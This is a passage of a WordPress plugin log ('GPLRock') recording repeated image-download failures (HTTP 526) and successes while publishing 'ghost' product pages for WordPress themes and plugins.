3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:01 UTC] GPLRock WARNING: Image download failed for product kidz-kids-store-and-baby-shop-theme. URL: https://meldwp.com/wp-content/uploads/kidz---kids-store-and-baby-shop-theme-2306.webp [06-Apr-2026 20:56:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kidz-kids-store-and-baby-shop-theme [06-Apr-2026 20:56:01 UTC] GPLRock: Image download failed for product orien-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:03 UTC] GPLRock: Image download failed for product orien-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/orien---creative-portfolio-wordpress-theme-1738.webp for product orien-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:05 UTC] GPLRock: Image download failed for product orien-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:07 UTC] GPLRock: Image download failed for product orien-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/orien---creative-portfolio-wordpress-theme-1738.webp for product orien-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:09 UTC] GPLRock WARNING: Image download failed for product orien-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/orien---creative-portfolio-wordpress-theme-1738.webp [06-Apr-2026 20:56:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: orien-creative-portfolio-wordpress-theme [06-Apr-2026 20:56:09 UTC] GPLRock: Image download failed for product motelin-hotel-resort-booking-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:12 UTC] GPLRock: Image download failed for product motelin-hotel-resort-booking-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motelin---hotel--resort-booking-elementor-wordpress-theme-22785.webp for product motelin-hotel-resort-booking-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:14 UTC] GPLRock: Image download failed for product motelin-hotel-resort-booking-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:16 UTC] GPLRock: Image download failed for product motelin-hotel-resort-booking-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motelin---hotel--resort-booking-elementor-wordpress-theme-22785.webp for product motelin-hotel-resort-booking-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:18 UTC] GPLRock WARNING: Image download failed for product motelin-hotel-resort-booking-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/motelin---hotel--resort-booking-elementor-wordpress-theme-22785.webp [06-Apr-2026 20:56:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: motelin-hotel-resort-booking-elementor-wordpress-theme [06-Apr-2026 20:56:18 UTC] GPLRock: Image downloaded successfully for product reco-minimal-lightweight-amp-theme-for-freebies (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d8026bb.webp [06-Apr-2026 20:56:18 UTC] GPLRock: Using pre-downloaded image for product reco-minimal-lightweight-amp-theme-for-freebies: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d8026bb.webp [06-Apr-2026 20:56:18 UTC] GPLRock: Ghost product published with image - Product ID: reco-minimal-lightweight-amp-theme-for-freebies [06-Apr-2026 20:56:18 UTC] GPLRock: Image download failed for product pray-charity-nonprofit-fundraising-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:20 UTC] GPLRock: Image download failed for product pray-charity-nonprofit-fundraising-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pray---charity--nonprofit--fundraising-wordpress-5554.webp for product pray-charity-nonprofit-fundraising-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:23 UTC] GPLRock: Image download failed for product pray-charity-nonprofit-fundraising-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:25 UTC] GPLRock: Image download failed for product pray-charity-nonprofit-fundraising-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pray---charity--nonprofit--fundraising-wordpress-5554.webp for product pray-charity-nonprofit-fundraising-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:27 UTC] GPLRock WARNING: Image download failed for product pray-charity-nonprofit-fundraising-wordpress. URL: https://meldwp.com/wp-content/uploads/pray---charity--nonprofit--fundraising-wordpress-5554.webp [06-Apr-2026 20:56:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pray-charity-nonprofit-fundraising-wordpress [06-Apr-2026 20:56:27 UTC] GPLRock: Image download failed for product grevo-electric-vehicle-charging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:29 UTC] GPLRock: Image download failed for product grevo-electric-vehicle-charging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grevo---electric-vehicle-charging-wordpress-theme-2932.webp for product grevo-electric-vehicle-charging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:31 UTC] GPLRock: Image download failed for product grevo-electric-vehicle-charging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:33 UTC] GPLRock: Image download failed for product grevo-electric-vehicle-charging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/grevo---electric-vehicle-charging-wordpress-theme-2932.webp for product grevo-electric-vehicle-charging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:35 UTC] GPLRock WARNING: Image download failed for product grevo-electric-vehicle-charging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/grevo---electric-vehicle-charging-wordpress-theme-2932.webp [06-Apr-2026 20:56:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: grevo-electric-vehicle-charging-wordpress-theme [06-Apr-2026 20:56:36 UTC] GPLRock: Image download failed for product samantha-personal-trainer-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:38 UTC] GPLRock: Image download failed for product samantha-personal-trainer-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/samantha---personal-trainer--fitness-wordpress-theme-7734.webp for product samantha-personal-trainer-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:40 UTC] GPLRock: Image download failed for product samantha-personal-trainer-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:42 UTC] GPLRock: Image download failed for product samantha-personal-trainer-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/samantha---personal-trainer--fitness-wordpress-theme-7734.webp for product samantha-personal-trainer-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:44 UTC] GPLRock WARNING: Image download failed for product samantha-personal-trainer-fitness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/samantha---personal-trainer--fitness-wordpress-theme-7734.webp [06-Apr-2026 20:56:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: samantha-personal-trainer-fitness-wordpress-theme [06-Apr-2026 20:56:44 UTC] GPLRock: Image download failed for product kloud-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:46 UTC] GPLRock: Image download failed for product kloud-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kloud---creative-multipurpose-wordpress-theme-24341.webp for product kloud-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:48 UTC] GPLRock: Image download failed for product kloud-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:51 UTC] GPLRock: Image download failed for product kloud-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kloud---creative-multipurpose-wordpress-theme-24341.webp for product kloud-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:53 UTC] GPLRock WARNING: Image download failed for product kloud-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kloud---creative-multipurpose-wordpress-theme-24341.webp [06-Apr-2026 20:56:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kloud-creative-multipurpose-wordpress-theme [06-Apr-2026 20:56:53 UTC] GPLRock: Image download failed for product stego-food-truck-restaurant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:55 UTC] GPLRock: Image download failed for product stego-food-truck-restaurant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stego---food-truck--restaurant-theme-28214.webp for product stego-food-truck-restaurant-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:56:57 UTC] GPLRock: Image download failed for product stego-food-truck-restaurant-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:59 UTC] GPLRock: Image download failed for product stego-food-truck-restaurant-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:57:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stego---food-truck--restaurant-theme-28214.webp for product stego-food-truck-restaurant-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:57:01 UTC] GPLRock WARNING: Image download failed for product stego-food-truck-restaurant-theme. URL: https://meldwp.com/wp-content/uploads/stego---food-truck--restaurant-theme-28214.webp [06-Apr-2026 20:57:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stego-food-truck-restaurant-theme [06-Apr-2026 20:57:01 UTC] GPLRock: Image download failed for product tower-business-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:57:04 UTC] GPLRock: Image download failed for product tower-business-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:57:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tower--business-wordpress-20697.webp for product tower-business-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:57:06 UTC] GPLRock: Image download failed for product tower-business-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:57:08 UTC] GPLRock: Image download failed for product tower-business-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:57:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tower--business-wordpress-20697.webp for product tower-business-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:57:10 UTC] GPLRock WARNING: Image download failed for product tower-business-wordpress. URL: https://meldwp.com/wp-content/uploads/tower--business-wordpress-20697.webp [06-Apr-2026 20:57:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tower-business-wordpress [06-Apr-2026 20:58:08 UTC] GPLRock: Image downloaded successfully for product mythemeshop-simpleton-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-71edd24f.jpg [06-Apr-2026 20:58:08 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-simpleton-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-71edd24f.jpg [06-Apr-2026 20:58:08 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-simpleton-wordpress-theme [06-Apr-2026 20:58:09 UTC] GPLRock: Image downloaded successfully for product themify-builder-pointers (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e76971ac.jpg [06-Apr-2026 20:58:09 UTC] GPLRock: Using pre-downloaded image for product themify-builder-pointers: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e76971ac.jpg [06-Apr-2026 20:58:09 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-pointers [06-Apr-2026 20:58:11 UTC] GPLRock: Image downloaded successfully for product charity-hub-nonprofit-fundraising-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-83a6648c.jpg [06-Apr-2026 20:58:11 UTC] GPLRock: Using pre-downloaded image for product charity-hub-nonprofit-fundraising-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-83a6648c.jpg [06-Apr-2026 20:58:11 UTC] GPLRock: Ghost product published with image - Product ID: charity-hub-nonprofit-fundraising-wordpress [06-Apr-2026 20:58:12 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-documents (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8a1ed5c.jpg [06-Apr-2026 20:58:12 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-documents: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8a1ed5c.jpg [06-Apr-2026 20:58:12 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-documents [06-Apr-2026 20:58:14 UTC] GPLRock: Image downloaded successfully for product studiopress-metro-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-368ffff9.jpg [06-Apr-2026 20:58:14 UTC] GPLRock: Using pre-downloaded image for product studiopress-metro-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-368ffff9.jpg [06-Apr-2026 20:58:14 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-metro-pro-genesis-wordpress-theme [06-Apr-2026 20:58:15 UTC] GPLRock: Image downloaded successfully for product memberpress-mailrelay (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a8998d0.jpg [06-Apr-2026 20:58:15 UTC] GPLRock: Using pre-downloaded image for product memberpress-mailrelay: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8a8998d0.jpg [06-Apr-2026 20:58:15 UTC] GPLRock: Ghost product published with image - Product ID: memberpress-mailrelay [06-Apr-2026 20:58:17 UTC] GPLRock: Image downloaded successfully for product mythemeshop-howto-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a2091f9.jpg [06-Apr-2026 20:58:17 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-howto-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a2091f9.jpg [06-Apr-2026 20:58:17 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-howto-wordpress-theme [06-Apr-2026 20:58:18 UTC] GPLRock: Image downloaded successfully for product ninja-forms-highrise-crm (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e580c59.jpg [06-Apr-2026 20:58:19 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-highrise-crm: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e580c59.jpg [06-Apr-2026 20:58:19 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-highrise-crm [06-Apr-2026 20:58:20 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-paypal-pro-and-paypal-express (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a23d75df.jpg [06-Apr-2026 20:58:20 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-paypal-pro-and-paypal-express: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a23d75df.jpg [06-Apr-2026 20:58:20 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-paypal-pro-and-paypal-express [06-Apr-2026 20:58:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-stamps-com-xml-file-export (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-094f95b4.jpg [06-Apr-2026 20:58:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-stamps-com-xml-file-export: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-094f95b4.jpg [06-Apr-2026 20:58:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-stamps-com-xml-file-export [06-Apr-2026 21:00:57 UTC] GPLRock: Image downloaded successfully for product kenela-dog-breeder-adoption-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c1eb11b.webp [06-Apr-2026 21:00:57 UTC] GPLRock: Using pre-downloaded image for product kenela-dog-breeder-adoption-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c1eb11b.webp [06-Apr-2026 21:00:57 UTC] GPLRock: Ghost product published with image - Product ID: kenela-dog-breeder-adoption-wordpress-theme [06-Apr-2026 21:00:58 UTC] GPLRock: Image downloaded successfully for product optcare-eye-care-wordpress-theme-rtl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6531549.webp [06-Apr-2026 21:00:58 UTC] GPLRock: Using pre-downloaded image for product optcare-eye-care-wordpress-theme-rtl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e6531549.webp [06-Apr-2026 21:00:58 UTC] GPLRock: Ghost product published with image - Product ID: optcare-eye-care-wordpress-theme-rtl [06-Apr-2026 21:00:58 UTC] GPLRock: Image download failed for product helpgrove-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:00 UTC] GPLRock: Image download failed for product helpgrove-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helpgrove---nonprofit-charity-wordpress-theme-8630.webp for product helpgrove-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:03 UTC] GPLRock: Image download failed for product helpgrove-nonprofit-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:05 UTC] GPLRock: Image download failed for product helpgrove-nonprofit-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helpgrove---nonprofit-charity-wordpress-theme-8630.webp for product helpgrove-nonprofit-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:07 UTC] GPLRock WARNING: Image download failed for product helpgrove-nonprofit-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/helpgrove---nonprofit-charity-wordpress-theme-8630.webp [06-Apr-2026 21:01:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: helpgrove-nonprofit-charity-wordpress-theme [06-Apr-2026 21:01:07 UTC] GPLRock: Image download failed for product dot-blog-pro-creative-wordpress-theme-for-bloggers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:09 UTC] GPLRock: Image download failed for product dot-blog-pro-creative-wordpress-theme-for-bloggers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dot-blog-pro---creative-wordpress-theme-for-bloggers-24749.webp for product dot-blog-pro-creative-wordpress-theme-for-bloggers after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:11 UTC] GPLRock: Image download failed for product dot-blog-pro-creative-wordpress-theme-for-bloggers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:13 UTC] GPLRock: Image download failed for product dot-blog-pro-creative-wordpress-theme-for-bloggers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dot-blog-pro---creative-wordpress-theme-for-bloggers-24749.webp for product dot-blog-pro-creative-wordpress-theme-for-bloggers after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:16 UTC] GPLRock WARNING: Image download failed for product dot-blog-pro-creative-wordpress-theme-for-bloggers. URL: https://meldwp.com/wp-content/uploads/dot-blog-pro---creative-wordpress-theme-for-bloggers-24749.webp [06-Apr-2026 21:01:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dot-blog-pro-creative-wordpress-theme-for-bloggers [06-Apr-2026 21:01:16 UTC] GPLRock: Image download failed for product yoga-fit-sports-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:18 UTC] GPLRock: Image download failed for product yoga-fit-sports-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yoga-fit---sports--fitness-wordpress-theme-18501.webp for product yoga-fit-sports-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:20 UTC] GPLRock: Image download failed for product yoga-fit-sports-fitness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:22 UTC] GPLRock: Image download failed for product yoga-fit-sports-fitness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yoga-fit---sports--fitness-wordpress-theme-18501.webp for product yoga-fit-sports-fitness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:24 UTC] GPLRock WARNING: Image download failed for product yoga-fit-sports-fitness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yoga-fit---sports--fitness-wordpress-theme-18501.webp [06-Apr-2026 21:01:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yoga-fit-sports-fitness-wordpress-theme [06-Apr-2026 21:01:24 UTC] GPLRock: Image download failed for product aura-one-page-multi-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:26 UTC] GPLRock: Image download failed for product aura-one-page-multi-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aura---one-page--multi-page-wordpress-theme-8508.webp for product aura-one-page-multi-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:29 UTC] GPLRock: Image download failed for product aura-one-page-multi-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:31 UTC] GPLRock: Image download failed for product aura-one-page-multi-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aura---one-page--multi-page-wordpress-theme-8508.webp for product aura-one-page-multi-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:33 UTC] GPLRock WARNING: Image download failed for product aura-one-page-multi-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aura---one-page--multi-page-wordpress-theme-8508.webp [06-Apr-2026 21:01:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aura-one-page-multi-page-wordpress-theme [06-Apr-2026 21:01:33 UTC] GPLRock: Image download failed for product yogaa-healthy-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:35 UTC] GPLRock: Image download failed for product yogaa-healthy-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yogaa--healthy-beauty-wordpress-theme-5162.webp for product yogaa-healthy-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:37 UTC] GPLRock: Image download failed for product yogaa-healthy-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:39 UTC] GPLRock: Image download failed for product yogaa-healthy-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yogaa--healthy-beauty-wordpress-theme-5162.webp for product yogaa-healthy-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:41 UTC] GPLRock WARNING: Image download failed for product yogaa-healthy-beauty-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yogaa--healthy-beauty-wordpress-theme-5162.webp [06-Apr-2026 21:01:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yogaa-healthy-beauty-wordpress-theme [06-Apr-2026 21:01:42 UTC] GPLRock: Image download failed for product engitech-it-solutions-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:44 UTC] GPLRock: Image download failed for product engitech-it-solutions-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/engitech---it-solutions--services-wordpress-theme-15898.webp for product engitech-it-solutions-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:46 UTC] GPLRock: Image download failed for product engitech-it-solutions-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:48 UTC] GPLRock: Image download failed for product engitech-it-solutions-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/engitech---it-solutions--services-wordpress-theme-15898.webp for product engitech-it-solutions-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:50 UTC] GPLRock WARNING: Image download failed for product engitech-it-solutions-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/engitech---it-solutions--services-wordpress-theme-15898.webp [06-Apr-2026 21:01:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: engitech-it-solutions-services-wordpress-theme [06-Apr-2026 21:01:50 UTC] GPLRock: Image download failed for product hireo-job-board-freelance-services-marketplace-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:52 UTC] GPLRock: Image download failed for product hireo-job-board-freelance-services-marketplace-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hireo---job-board--freelance-services-marketplace-html-template-27306.webp for product hireo-job-board-freelance-services-marketplace-html-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:55 UTC] GPLRock: Image download failed for product hireo-job-board-freelance-services-marketplace-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:57 UTC] GPLRock: Image download failed for product hireo-job-board-freelance-services-marketplace-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 21:01:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hireo---job-board--freelance-services-marketplace-html-template-27306.webp for product hireo-job-board-freelance-services-marketplace-html-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 21:01:59 UTC] GPLRock WARNING: Image download failed for product hireo-job-board-freelance-services-marketplace-html-template. URL: https://meldwp.com/wp-content/uploads/hireo---job-board--freelance-services-marketplace-html-template-27306.webp [06-Apr-2026 21:01:59 UTC] GPLRock WARNING: 